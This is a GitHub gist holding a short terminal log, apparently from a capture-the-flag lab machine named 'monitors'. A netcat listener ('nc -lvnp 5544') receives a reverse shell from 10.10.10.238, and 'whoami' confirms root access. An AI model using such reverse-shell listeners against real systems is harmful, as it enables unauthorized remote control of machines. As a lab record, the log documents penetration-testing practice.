Created
September 11, 2021 08:22
-
-
Save oxtd/95cec38cd29cebf54eab9b749dc796b2 to your computer and use it in GitHub Desktop.
root
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| marcus@monitors:~$ nc -lvnp 5544 | |
| Listening on [0.0.0.0] (family 0, port 5544) | |
| Connection from 10.10.10.238 46392 received! | |
| bash: cannot set terminal process group (-1): Inappropriate ioctl for device | |
| bash: no job control in this shell | |
| root@monitors:/# whoami | |
| whoami | |
| root |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment